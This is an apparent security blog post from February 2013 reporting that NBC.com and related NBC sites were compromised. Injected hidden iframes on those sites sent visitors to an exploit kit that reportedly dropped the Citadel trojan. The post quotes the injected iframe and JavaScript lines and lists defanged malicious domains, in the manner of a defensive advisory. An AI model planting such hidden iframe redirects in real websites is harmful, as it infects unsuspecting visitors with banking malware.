The Latest in IT Security

NBC Website HACKED – Be Careful Surfing

22
Feb
2013

Breaking, the NBC site is currently compromised and blacklisted by Google. Anyone that visits the site (which includes any sub page) will have malicious iframes loaded as well redirecting the user to exploit kits (Redkit):

*Update: Not only NBC.com, but many other NBC sites, including Late Night with Jimmy Fallon, Jay Lenos garage and others.

Screen Shot 2013-02-21 at 11.15.51 AM

If you are visiting it from Chrome or Firefox would get the following warning:

Screen Shot 2013-02-21 at 11.18.14 AM

It seems that the payload is conditional, so a different iframe domain is loaded each time (cycling out various domains). Some of the malicious domains we identified include:

hxxp://walterjeffers.com/hxxp://nikweinstein.com/hxxp://umaiskhan.com/htxp://wordpresspluginsstudio.com/ctuk.html

All their pages had this iframe injected:

<iframe src=”httx://nikweinstein.com/cl/google.php” width=1 height=1..

And this is what got added to their javascript files:

document.writeln (” <iframe src=\”httx://walterjeffers.com/ctuk.html\” width=1&nbsp..

Note that these domains are changing, this tells us that something on the server is generating the payload. This isn’t an uncommon practice, it also tells us that the script is likely still on the box. The fact that it’s impacting other sites tells us that the compromise might extend beyond the web application and onto the server. If those other sites are stored on separate boxes then we’re looking at a much bigger, network, compromise, but that is speculative at the moment.

Our research team is analyzing the case (and the malware) and we will post more updates soon. What we can tell is that you should not visit NBC’s site right now. More details on the scan results here: http://sitecheck.sucuri.net/.

The folks at hitmanpro.blog are confirming that it is a drive-by-download attack, specifically using the Citadel Trojan, used for bankin fraud and cyber-espionage. As for the attack vector leading to the compromise, that’s always a challenge to speculate on.

It also appears that the compromise extends to other properties, just found out that the Late Night with Jimmy Fallon is also compromised:

Screen Shot 2013-02-21 at 11.48.24 AM

****Update: 13:42 PST | 02/21/2013*****

We did come across this great post by Dancho Danchev in which he better explains things. It looks like this is, was, a complex attack cycling out drive-by-downloads and malicious redirects. He adds the following domains to the growing list of those being cycled for the iframes:

hxxp://priceworldpublishing.com/aynk.htmlhxxp://toplineops.com/mtnk.htmlhxxp://moi-npovye-sploett.com/qqqq/1.phphxxp://www.jaylenosgarage.com/trucks/PHP/google.php

He expands things with a list of domains being used for redirection:

hxxp://gonullersultani.net/znzd.htmhxxp://erabisnis.net/znzd.htmhxxp://electricianfortwayne.info/62.htmlhxxp://moi-npovye-sploett.com/cGeQc0wz1KPI/larktion.php

He goes on to explain the payload being dropped, payload hash. He goes on to break down it’s phone home mechanisms and begins to correlate this attack with others to find some association. Based on his analysis he correlates these attackers with the same group responsive for the Facebook and Verizon spear phishing attempts a few days ago. He goes on to provide a lot more data.

Some are attributing the the payload itself to be generated by the RedKit Exploit Kit, but that is still unconfirmed.

While some folks are reporting it was only infected for 15 minutes we’re not too sure about that, as of right now, emulating a number of agents and crawling various links we are are still able to get it to render:

Screen Shot 2013-02-21 at 1.54.08 PM

Leave a reply


Categories

TUESDAY, MARCH 19, 2024
WHITE PAPERS

Mission-Critical Broadband – Why Governments Should Partner with Commercial Operators:
Many governments embrace mobile network operator (MNO) networks as ...

ARA at Scale: How to Choose a Solution That Grows With Your Needs:
Application release automation (ARA) tools enable best practices in...

The Multi-Model Database:
Part of the “new normal” where data and cloud applications are ...

Featured

Archives

Latest Comments